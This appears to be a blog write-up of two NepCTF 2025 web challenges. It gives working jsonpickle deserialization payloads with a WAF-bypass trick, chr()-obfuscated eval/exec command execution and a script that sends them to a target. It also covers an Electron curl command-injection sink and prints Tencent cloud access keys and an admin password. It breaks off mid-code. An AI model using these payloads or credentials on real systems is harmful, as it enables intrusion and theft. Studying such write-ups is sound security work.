Featured image of post 2025nepctf复现

2025nepctf复现

2025nepctf复现

safe_bank

先看描述

image-20250728195603173

在session里面打jsonpickle反序列化

先注册一个看看session,admin已经被注册,随便注册一个看Cookie

image-20250728195958010

cookie解码一下

1
{"py/object": "__main__.Session", "meta": {"user": "adm1n", "ts": 1753703934}}

没有签名直接改成admin

1
eyJweS9vYmplY3QiOiAiX19tYWluX18uU2Vzc2lvbiIsICJtZXRhIjogeyJ1c2VyIjogImFkbWluIiwgInRzIjogMTc1MzcwMzkzNH19

然后得到假flag,所以还是得打jsonpickle

先知找到一篇从源码看JsonPickle反序列化利用与绕WAF-先知社区

image-20250728203815276

找到这个部分,然后我们尝试放在user里面看回显

这里有个坑点,首先这篇文章是单引号,而python后端在这里只能解析双引号

然后就是这里标签需要换一下,我们先去看jsonpickle源码里面定义的标签

image-20250728205115267

然后查看newargs和newargsex

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def getargs(
    obj: Dict[str, Any], classes: Optional[Dict[str, Type[Any]]] = None
) -> List[Any]:
    """Return arguments suitable for __new__()"""
    # Let saved newargs take precedence over everything
    if has_tag(obj, tags.NEWARGSEX):
        raise ValueError('__newargs_ex__ returns both args and kwargs')

    if has_tag(obj, tags.NEWARGS):
        return obj[tags.NEWARGS]

    if has_tag(obj, tags.INITARGS):
        return obj[tags.INITARGS]

    try:
        seq_list = obj[tags.SEQ]
        obj_dict = obj[tags.OBJECT]
    except KeyError:
        return []
    typeref = loadclass(obj_dict, classes=classes)
    if not typeref:
        return []
    if hasattr(typeref, '_fields'):
        if len(typeref._fields) == len(seq_list):
            return seq_list
    return []

然后newargsex

1
2
 if has_tag(obj, tags.NEWARGSEX):
            args, kwargs = obj[tags.NEWARGSEX]

总之newargs标签是给实现了new之后的对象用的,然后newargsex不需要,但是需要上数组方式传,后面查找了一下是set标签

1
2
3
4
5
 def _restore_set(self, obj: Dict[str, Any]) -> Set[Any]:
        try:
            return {self._restore(v) for v in obj[tags.SET]}
        except TypeError:
            return set()

其实这篇文章的payload可以直接抄:强网S8决赛JsonPcikle Safe模式下的RCE与绕过分析研究-先知社区

然后我们上payload

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "glob.glob", "py/newargsex":[{"py/set":["/*"]},""]}, "ts": 1753703934}}

image-20250728212543087

看到这个目录,是要RCE

先进app目录读文件吧,还是用文章里面的payload

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "linecache.getlines", "py/newargsex":[{"py/set":["/app/app.py"]},""]}, "ts": 1753703934}}

读到源码

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
from flask import Flask, request, make_response, render_template, redirect, url_for
import jsonpickle
import base64
import json
import os
import time

app = Flask(__name__)
app.secret_key = os.urandom(24)

class Account:
    def __init__(self, uid, pwd):
        self.uid = uid
        self.pwd = pwd

class Session:
    def __init__(self, meta):
        self.meta = meta

users_db = [
    Account("admin", os.urandom(16).hex()),
    Account("guest", "guest")
]

def register_user(username, password):
    for acc in users_db:
        if acc.uid == username:
            return False
    users_db.append(Account(username, password))
    return True

FORBIDDEN = [
    'builtins', 'os', 'system', 'repr', '__class__', 'subprocess', 'popen', 'Popen', 'nt',
    'code', 'reduce', 'compile', 'command', 'pty', 'platform', 'pdb',  'pickle', 'marshal',
    'socket', 'threading', 'multiprocessing', 'signal', 'traceback', 'inspect', '\\\\', 'posix',
    'render_template', 'jsonpickle', 'cgi', 'execfile', 'importlib', 'sys', 'shutil', 'state',
    'import', 'ctypes', 'timeit', 'input', 'open', 'codecs', 'base64', 'jinja2', 're', 'json',
    'file', 'write', 'read', 'globals', 'locals', 'getattr', 'setattr', 'delattr', 'uuid',
    '__import__', '__globals__', '__code__', '__closure__', '__func__', '__self__', 'pydoc',
    '__module__', '__dict__', '__mro__', '__subclasses__', '__init__', '__new__'
]

def waf(serialized):
    try:
        data = json.loads(serialized)
        payload = json.dumps(data, ensure_ascii=False)
        for bad in FORBIDDEN:
            if bad in payload:
                return bad
        return None
    except:
        return "error"

@app.route('/')
def root():
    return render_template('index.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')
        
        if not username or not password or not confirm_password:
            return render_template('register.html', error="所有字段都是必填的。")
        
        if password != confirm_password:
            return render_template('register.html', error="密码不匹配。")
            
        if len(username) < 4 or len(password) < 6:
            return render_template('register.html', error="用户名至少需要4个字符,密码至少需要6个字符。")
        
        if register_user(username, password):
            return render_template('index.html', message="注册成功!请登录。")
        else:
            return render_template('register.html', error="用户名已存在。")
    
    return render_template('register.html')

@app.post('/auth')
def auth():
    u = request.form.get("u")
    p = request.form.get("p")
    for acc in users_db:
        if acc.uid == u and acc.pwd == p:
            sess_data = Session({'user': u, 'ts': int(time.time())})
            token_raw = jsonpickle.encode(sess_data)
            b64_token = base64.b64encode(token_raw.encode()).decode()
            resp = make_response("登录成功。")
            resp.set_cookie("authz", b64_token)
            resp.status_code = 302
            resp.headers['Location'] = '/panel'
            return resp
    return render_template('index.html', error="登录失败。用户名或密码无效。")

@app.route('/panel')
def panel():
    token = request.cookies.get("authz")
    if not token:
        return redirect(url_for('root', error="缺少Token。"))
    
    try:
        decoded = base64.b64decode(token.encode()).decode()
    except:
        return render_template('error.html', error="Token格式错误。")
    
    ban = waf(decoded)
    if waf(decoded):
        return render_template('error.html', error=f"请不要黑客攻击!{ban}")
    
    try:
        sess_obj = jsonpickle.decode(decoded, safe=True)
        meta = sess_obj.meta
        
        if meta.get("user") != "admin":
            return render_template('user_panel.html', username=meta.get('user'))
        
        return render_template('admin_panel.html')
    except Exception as e:
        return render_template('error.html', error=f"数据解码失败。")

@app.route('/vault')
def vault():
    token = request.cookies.get("authz")
    if not token:
        return redirect(url_for('root'))

    try:
        decoded = base64.b64decode(token.encode()).decode()
        if waf(decoded):
            return render_template('error.html', error="请不要尝试黑客攻击!")
        sess_obj = jsonpickle.decode(decoded, safe=True)
        meta = sess_obj.meta
        
        if meta.get("user") != "admin":
            return render_template('error.html', error="访问被拒绝。只有管理员才能查看此页面。")
            
        flag = "NepCTF{fake_flag_this_is_not_the_real_one}"
            
        return render_template('vault.html', flag=flag)
    except:
        return redirect(url_for('root'))

@app.route('/about')
def about():
    return render_template('about.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=False)

主要是看到逆天waf了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
FORBIDDEN = [
    'builtins', 'os', 'system', 'repr', '__class__', 'subprocess', 'popen', 'Popen', 'nt',
    'code', 'reduce', 'compile', 'command', 'pty', 'platform', 'pdb',  'pickle', 'marshal',
    'socket', 'threading', 'multiprocessing', 'signal', 'traceback', 'inspect', '\\\\', 'posix',
    'render_template', 'jsonpickle', 'cgi', 'execfile', 'importlib', 'sys', 'shutil', 'state',
    'import', 'ctypes', 'timeit', 'input', 'open', 'codecs', 'base64', 'jinja2', 're', 'json',
    'file', 'write', 'read', 'globals', 'locals', 'getattr', 'setattr', 'delattr', 'uuid',
    '__import__', '__globals__', '__code__', '__closure__', '__func__', '__self__', 'pydoc',
    '__module__', '__dict__', '__mro__', '__subclasses__', '__init__', '__new__'
]

然后现在非预期直接把waf全删了

list对象有个clear方法,能够清空内容,刚好这里的waf就是list对象,然后__main__能获取全局变量

所以我们直接调用FORBIDDEN.clear

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "__main__.FORBIDDEN.clear", "py/newargs":[]}, "ts": 1753703934}}

注意这里改成newargs了,如果还用newargsex而没有set标签来传值会报错

image-20250728215205268

到这里把黑名单清空了,然后就很简单了

我们写文件到app目录下,用前面文章的RCE方法

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "subprocess.getoutput", "py/newargs":["/readflag > /app/1.txt"]}, "ts": 1753703934}}

然后用文章的读取方法

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "linecache.getlines", "py/newargs":["/app/1.txt"]}, "ts": 1753703934}}

image-20250728220031341

然后回到jsonpickle的源码util.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
def translate_module_name(module: str) -> str:
    """Rename builtin modules to a consistent module name.

    Prefer the more modern naming.

    This is used so that references to Python's `builtins` module can
    be loaded in both Python 2 and 3.  We remap to the "__builtin__"
    name and unmap it when importing.

    Map the Python2 `exceptions` module to `builtins` because
    `builtins` is a superset and contains everything that is
    available in `exceptions`, which makes the translation simpler.

    See untranslate_module_name() for the reverse operation.
    """
    lookup = dict(__builtin__='builtins', exceptions='builtins')
    return lookup.get(module, module)

发现builtins跟exceptions等价了,然后应该能获取builtins里面的危险函数直接RCE,不过我没成功

后面找到这篇JsonPickle调试分析原理及WAF绕过-先知社区

最后介绍的方法也能RCE

image-20250802124827265

但是这里用的builtins会被waf,上面写了一个py2的兼容,所以我们可以用__builtin__来替代builtins

payload

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object":"__builtin__.bytes", "py/newargs":{"py/object": "__builtin__.map", "py/newargs" : [{"py/function": "__builtin__.exec"}, ["/readflag >/app/1.txt"]]}}, "ts": 1754109516}}

但是这里直接执行会被检测到re,我们换成chr函数包裹的形式

1
{"py/object": "__main__.Session", "meta": {"user": {"py/object": "__builtin__.bytes", "py/newargs": {"py/object": "__builtin__.map", "py/newargs": [{"py/function": "__builtin__.eval"}, ["exec(chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(32)+chr(111)+chr(115)+chr(59)+chr(111)+chr(115)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(47)+chr(114)+chr(101)+chr(97)+chr(100)+chr(102)+chr(108)+chr(97)+chr(103)+chr(62)+chr(47)+chr(97)+chr(112)+chr(112)+chr(47)+chr(49)+chr(46)+chr(116)+chr(120)+chr(116)+chr(39)+chr(41))"]]}}, "ts": 1753971621}}

这里可以上脚本来实现转换并发包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
import base64
import json
import requests

# 修改这里的配置
TARGET_URL = "https://nepctf30-ykq3-vx0c-cfnd-oyni8f0uw464.nepctf.com/panel"
COMMAND = "import os;os.system('/readflag>/app/1.txt')"


def string_to_chr(s):
    return "+".join([f"chr({ord(c)})" for c in s])


def generate_payload(command):
    # 转换命令为chr()形式
    chr_command = string_to_chr(command)

    # 构造payload
    payload = {
        "py/object": "__main__.Session",
        "meta": {
            "user": {
                "py/object": "__builtin__.bytes",
                "py/newargs": {
                    "py/object": "__builtin__.map",
                    "py/newargs": [
                        {"py/function": "__builtin__.eval"},
                        [f"exec({chr_command})"],
                    ],
                },
            },
            "ts": 1753971621,
        },
    }

    # 转为JSON字符串
    json_payload = json.dumps(payload, ensure_ascii=False)
    print(f"JSON Payload: {json_payload}")

    # Base64编码
    b64_payload = base64.b64encode(json_payload.encode()).decode()

    return b64_payload


def send_request(url, payload):
    headers = {
        "Cookie": f"authz={payload}",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Sec-Ch-Ua": '"Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138"',
        "Sec-Ch-Ua-Mobile": "?0",
        "Sec-Ch-Ua-Platform": '"Windows"',
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Dest": "document",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Sec-Fetch-User": "?1",
        "Priority": "u=0, i",
        "Connection": "keep-alive",
    }

    try:
        response = requests.get(url, headers=headers, timeout=10)
        return response
    except Exception as e:
        print(f"请求失败: {e}")
        return None


if __name__ == "__main__":
    print(f"目标URL: {TARGET_URL}")
    print(f"执行命令: {COMMAND}")
    print("-" * 50)

    # 生成payload
    payload = generate_payload(COMMAND)
    print(f"生成的payload: {payload}")
    print()

    # 发送请求
    print("发送请求中...")
    response = send_request(TARGET_URL, payload)

    if response:
        print(f"状态码: {response.status_code}")
        print(f"响应长度: {len(response.text)}")
        print("响应内容:")
        print("-" * 30)
        print(response.text)
    else:
        print("请求失败!")

fakeXSS

7z解压这个exe,其实看到图标就知道是electron框架,用7z解压可以看到app

发现一个asar文件,搜到一个https://github.com/flydoos/WinASAR/releases/tag/1.5.0

可以解压asar的工具,然后解压得到源码

image-20250802131253140

可以看到main.js

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
const { app, BrowserWindow, ipcMain } = require('electron');
const path = require('path');
const { exec } = require('child_process');

let mainWindow = null;

function createWindow() {
  mainWindow = new BrowserWindow({
    width: 1600,
    height: 1200,
    webPreferences: {
      preload: path.join(__dirname, 'preload.js'),
      contextIsolation: true,
    }
  });

  // 默认加载本地输入页面
  mainWindow.loadFile('index.html');
}

app.whenReady().then(createWindow);

// 接收用户输入的地址并加载它
ipcMain.handle('load-remote-url', async (event, url) => {

  if (mainWindow) {
    mainWindow.loadURL(url);
  }
});

ipcMain.handle('curl', async (event, url) => {
  return new Promise((resolve) => {

    const cmd = `curl -L "${url}"`;

    exec(cmd, (error, stdout, stderr) => {
      if (error) {
        return resolve({ success: false, error: error.message });
      }
      resolve({ success: true, data: stdout });
    });
  });
});

这个curl绝对有问题,回到题目,我们先注册账号

上传头像这里抓包看到token

image-20250802134140956

询问ai也能得到是腾讯云COS

image-20250802134253233

而且前端也能看到dashboard.html,也能看出是腾讯云COS

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// 加载头像
      async function loadAvatar() {
          try {
              const bucket = 'test-1360802834';
              const region = 'ap-guangzhou';
              const avatarKey = `picture/${user.uuid}.png`;
              const avatarUrl = `https://${bucket}.cos.${region}.myqcloud.com/${avatarKey}`;

              // 发送不带 Authorization 和 x-cos-security-token 头的 HEAD 请求
              const response = await fetch(avatarUrl, {
                  method: 'HEAD'
              });

              if (response.ok) {
                  // 头像存在,显示它
                  avatarImg.src = `${avatarUrl}?t=${Date.now()}`;
                  uploadStatus.textContent = '已上传头像';
              } else {
                  // 头像不存在,显示默认头像
                  avatarImg.src = '/default/default.png';
                  uploadStatus.textContent = '未上传头像';
              }
          } catch (error) {
              console.error('加载头像失败:', error);
              uploadStatus.textContent = '加载头像失败';
          }
      }

接下来就是拷打ai,写脚本获取存储桶里面的数据了

通过pip install -U cos-python-sdk-v5 -i https://pypi.tuna.tsinghua.edu.cn/simple下载python SDK

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from qcloud_cos import CosConfig, CosS3Client
import logging
import os

# 配置日志
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# 配置临时密钥(使用你的凭证)
config = CosConfig(
    Region='ap-guangzhou',
    SecretId='AKID48dxsVuU-n3T-qhSvD24ov6wRm1z-F_28RbKJymUC7Rvqm9nLpw35jOy3JG5DbNs',
    SecretKey='L0X0kuKzBHQg6KnkYKNgC62NVwfYHSVBojndR1DgVAE=',
    Token='4GI2OKsAz8SBLiWtk6X55LCBH4uHkEba3b1ad4ebe0463df250c708dffa7fd67dvPktnu9NJjWklQdkVP2e3iiRiXyWVqH1dpg03ZE1nY1YA6M2UdEdr9jHjgbmVINwsREabk7IcymrzZHAdtQepUkUAEU-O7oCVl82IpuLHtje4FBU7FJ6Qjeavjo8kL1Rp__nyI1pVWrwr8ezurXzFl0YPrPBZilG1F2V48SLQgozeqYwGZ-0OgHcIS8WUSn1h7bgt3xXTO6U7m1h5XxqDntX_l8ig8kt9LB2BpPGV2I50VW-WDGSrGyVhDv-oEczY6mX0MHobeV8-HdZaVsQO-c60iRX7PoGDoJg8LXj-ODlqEn2W0wUl-5AVOugH2iiJ5cKKuC2Y_pr_W1DgPIZVV0XKBQdWJaJfx0elgHEKOpm1YJFcKijDjZbc4hO2jSE8RxhrxVWYrB1dYeon7m-GcNJhY9qsmO1SA7WP9alFx_i6AkqFNNqeMKQFDZjgcvRuwYPvbNMAD5QOgK6ErT-Rw'
)
client = CosS3Client(config)

def list_and_download_accessible_files():
    """列出并尝试下载所有可访问的文件"""
    try:
        # 1. 列出存储桶文件
        response = client.list_objects(Bucket='test-1360802834', MaxKeys=1000)
        if 'Contents' not in response:
            print("存储桶为空或没有权限访问。")
            return

        # 2. 过滤掉目录(以/结尾的项)
        files = [f for f in response['Contents'] if not f['Key'].endswith('/')]
        print(f"找到 {len(files)} 个文件(尝试下载有权限的文件):")

        # 3. 尝试下载每个文件
        downloaded_count = 0
        for file in files:
            key = file['Key']
            local_name = os.path.basename(key) or f"file_{files.index(file)}"
            
            try:
                # 检查是否有权限下载
                client.head_object(Bucket='test-1360802834', Key=key)
                
                # 处理文件名冲突
                final_name = local_name
                counter = 1
                while os.path.exists(final_name):
                    name, ext = os.path.splitext(local_name)
                    final_name = f"{name}({counter}){ext}"
                    counter += 1

                # 下载文件
                print(f"下载: {key} -> {final_name}")
                client.get_object(
                    Bucket='test-1360802834',
                    Key=key,
                    DownloadPath=final_name
                )
                downloaded_count += 1
            except Exception as e:
                print(f"跳过无权限文件: {key} (错误: {str(e)})")

        print(f"\n成功下载 {downloaded_count} 个文件(当前目录)。")

    except Exception as e:
        print(f"操作失败: {str(e)}")

if __name__ == '__main__':
    list_and_download_accessible_files()

虽然很奇怪为什么不能直接下载,我们直接手动下载flag.txt和server_bak.js

image-20250802140323953

flag.txt

1
fake{看看www/server_bak.js对象}

server_bak.js

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const tencentcloud = require("tencentcloud-sdk-nodejs");
const path = require('path');
const fs = require('fs');
const { v4: uuidv4 } = require('uuid');
const { execFile } = require('child_process');
const he = require('he');


const app = express();
const PORT = 3000;

app.use((req, res, next) => {
  res.setHeader('Access-Control-Allow-Origin', '*');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
  res.setHeader('Access-Control-Allow-Credentials', 'true');
  next();
});

// 配置会话
app.use(session({
  secret: 'ctf-secret-key_023dfpi0e8hq',
  resave: false,
  saveUninitialized: true,
  cookie: { secure: false , httpOnly: false}
}));

app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'public')));

// 用户数据库
const users = {'admin': { password: 'nepn3pctf-game2025', role: 'admin', uuid: uuidv4(), bio: '' }};
// 存储登录页面背景图片 URL
let loginBgUrl = '';

// STS 客户端配置
const StsClient = tencentcloud.sts.v20180813.Client;
const clientConfig = {
  credential: {
    secretId: "AKIDRaszDXeZJin6JHbjeOjLQL3Yp4EAvR",
    secretKey: "NXUDi2B7rONBU8IF4pZ9d9AndjSzKRN6",
  },
  region: "ap-guangzhou",
  profile: {
    httpProfile: {
      endpoint: "sts.tencentcloudapi.com",
    },
  },
};
const client = new StsClient(clientConfig);

// 注册接口
app.post('/api/register', (req, res) => {
  const { username, password } = req.body;
  if (users[username]) {
    return res.status(409).json({ success: false, message: '用户名已存在' });
  }
  const uuid = uuidv4();
  users[username] = { password, role: 'user', uuid, bio: '' };
  res.json({ success: true, message: '注册成功' });
});

// 登录页面
app.get('/', (req, res) => {
  let loginHtml = fs.readFileSync(path.join(__dirname, 'public', 'login.html'), 'utf8');
  if (loginBgUrl) {
    const key = loginBgUrl.replace('/uploads/', 'uploads/');
    const fileUrl = `http://ctf.mudongmudong.com/${key}`;

    const iframeHtml = `<iframe id="backgroundframe" src="${fileUrl}" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; border: none;"></iframe>`;
    loginHtml = loginHtml.replace('</body>', `${iframeHtml}</body>`);
  }
  res.send(loginHtml);
});



// 登录接口
app.post('/api/login', (req, res) => {
  const { username, password } = req.body;
  const user = users[username];

  if (user && user.password === password) {
    req.session.user = { username, role: user.role, uuid: user.uuid };
    res.json({ success: true, role: user.role });
  } else {
    res.status(401).json({ success: false, message: '认证失败' });
  }
});

// 检查用户是否已登录
function ensureAuthenticated(req, res, next) {
  if (req.session.user) {
    next();
  } else {
    res.status(401).json({ success: false, message: '请先登录' });
  }
}

// 获取用户信息
app.get('/api/user', ensureAuthenticated, (req, res) => {
  const user = users[req.session.user.username];
  res.json({ username: req.session.user.username, role: req.session.user.role, uuid: req.session.user.uuid, bio: user.bio });
});

// 获取头像临时密钥
app.get('/api/avatar-credentials', ensureAuthenticated, async (req, res) => {
  const params = {
    Policy: JSON.stringify({
      version: "2.0",
      statement: [
        {
          effect: "allow",
          action: ["cos:PutObject"],
          resource: [
            `qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/picture/${req.session.user.uuid}.png`
          ],
          Condition: {
            numeric_equal: {
              "cos:request-count": 5
            },
            numeric_less_than_equal: {
              "cos:content-length": 10485760  // 10MB 大小限制
            }
          }
        },
        {
          effect: "allow",
          action: ["cos:GetBucket"],
          resource: [
            "qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/*"
          ]
        }
      ]
    }),
    DurationSeconds: 1800,
    Name: "avatar-upload-client"
  };

  try {
    const response = await client.GetFederationToken(params);
    const auth = Buffer.from(JSON.stringify(params.Policy)).toString('base64');
    res.json({ ...response.Credentials, auth });
  } catch (err) {
    console.error("获取头像临时密钥失败:", err);
    res.status(500).json({ error: '获取临时密钥失败' });
  }
});

// 获取文件上传临时密钥(管理员)
app.get('/api/file-credentials', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ error: '权限不足' });
  }

  const params = {
    Policy: JSON.stringify({
      version: "2.0",
      statement: [
        {
          effect: "allow",
          action: ["cos:PutObject"],
          resource: [
            `qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/uploads/${req.session.user.uuid}/*`
          ],
          Condition: {
            numeric_equal: {
              "cos:request-count": 5
            },
            numeric_less_than_equal: {
              "cos:content-length": 10485760  
            }
          }
        },
        {
          effect: "allow",
          action: ["cos:GetBucket"],
          resource: [
            "qcs::cos:ap-guangzhou:uid/1360802834:test-1360802834/*"
          ]
        }
      ]
    }),
    DurationSeconds: 1800,
    Name: "file-upload-client"
  };

  try {
    const response = await client.GetFederationToken(params);
    const auth = Buffer.from(JSON.stringify(params.Policy)).toString('base64');
    res.json({ ...response.Credentials, auth });
  } catch (err) {
    console.error("获取文件临时密钥失败:", err);
    res.status(500).json({ error: '获取临时密钥失败' });
  }
});

// 保存个人简介(做好 XSS 防护)
app.post('/api/save-bio', ensureAuthenticated, (req, res) => {
  const { bio } = req.body;
  const sanitizedBio = he.encode(bio);
  const user = users[req.session.user.username];
  user.bio = sanitizedBio;
  res.json({ success: true, message: '个人简介保存成功' });
});

// 退出登录
app.post('/api/logout', ensureAuthenticated, (req, res) => {
  req.session.destroy();
  res.json({ success: true });
});

// 设置登录页面背景
app.post('/api/set-login-bg', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }
  const { key } = req.body;
  bgURL = key;
  try {
    const fileUrl = `http://ctf.mudongmudong.com/${bgURL}`;
    const response = await fetch(fileUrl);
    if (response.ok) {
        const content = response.text();
    } else {
        console.error('获取文件失败:', response.statusText);
        return res.status(400).json({ success: false, message: '获取文件内容失败' });
    }
  } catch (error) {
      return res.status(400).json({ success: false, message: '打开文件失败' });
  }
  loginBgUrl = key;
  res.json({ success: true, message: '背景设置成功' });
});



app.get('/api/bot', ensureAuthenticated, (req, res) => {

  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }

  const scriptPath = path.join(__dirname, 'bot_visit');

  // bot 将会使用客户端软件访问 http://127.0.1:3000/ ,但是bot可不会带着他的秘密去访问哦

  execFile(scriptPath, ['--no-sandbox'], (error, stdout, stderr) => {
    if (error) {
      console.error(`bot visit fail: ${error.message}`);
      return res.status(500).json({ success: false, message: 'bot visit failed' });
    }

    console.log(`bot visit success:\n${stdout}`);
    res.json({ success: true, message: 'bot visit success' });
  });
});

// 下载客户端软件
app.get('/downloadClient', (req, res) => {
  const filePath = path.join(__dirname, 'client_setup.zip');

  if (!fs.existsSync(filePath)) {
    return res.status(404).json({ success: false, message: '客户端文件不存在' });
  }

  res.download(filePath, 'client_setup.zip', (err) => {
    if (err) {
      console.error('client download error: ', err);
      return res.status(500).json({ success: false, message: '下载失败' });
    } else {
    }
  });
});

// 启动服务器
app.listen(PORT, () => {
  console.log(`服务器运行在端口 ${PORT}`);
});

从登入界面源码我们可以看到

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
// 登录页面
app.get('/', (req, res) => {
  let loginHtml = fs.readFileSync(path.join(__dirname, 'public', 'login.html'), 'utf8');
  if (loginBgUrl) {
    const key = loginBgUrl.replace('/uploads/', 'uploads/');
    const fileUrl = `http://ctf.mudongmudong.com/${key}`;

    const iframeHtml = `<iframe id="backgroundframe" src="${fileUrl}" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; border: none;"></iframe>`;
    loginHtml = loginHtml.replace('</body>', `${iframeHtml}</body>`);
  }
  res.send(loginHtml);
});

这里直接将我们传入的fileurl拼接,我们查找发现后面背景设置也用到了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
// 设置登录页面背景
app.post('/api/set-login-bg', ensureAuthenticated, async (req, res) => {
  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }
  const { key } = req.body;
  bgURL = key;
  try {
    const fileUrl = `http://ctf.mudongmudong.com/${bgURL}`;
    const response = await fetch(fileUrl);
    if (response.ok) {
        const content = response.text();
    } else {
        console.error('获取文件失败:', response.statusText);
        return res.status(400).json({ success: false, message: '获取文件内容失败' });
    }
  } catch (error) {
      return res.status(400).json({ success: false, message: '打开文件失败' });
  }
  loginBgUrl = key;
  res.json({ success: true, message: '背景设置成功' });
});

bot的访问逻辑

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
app.get('/api/bot', ensureAuthenticated, (req, res) => {

  if (req.session.user.role !== 'admin') {
    return res.status(403).json({ success: false, message: '权限不足' });
  }

  const scriptPath = path.join(__dirname, 'bot_visit');

  // bot 将会使用客户端软件访问 http://127.0.1:3000/ ,但是bot可不会带着他的秘密去访问哦

  execFile(scriptPath, ['--no-sandbox'], (error, stdout, stderr) => {
    if (error) {
      console.error(`bot visit fail: ${error.message}`);
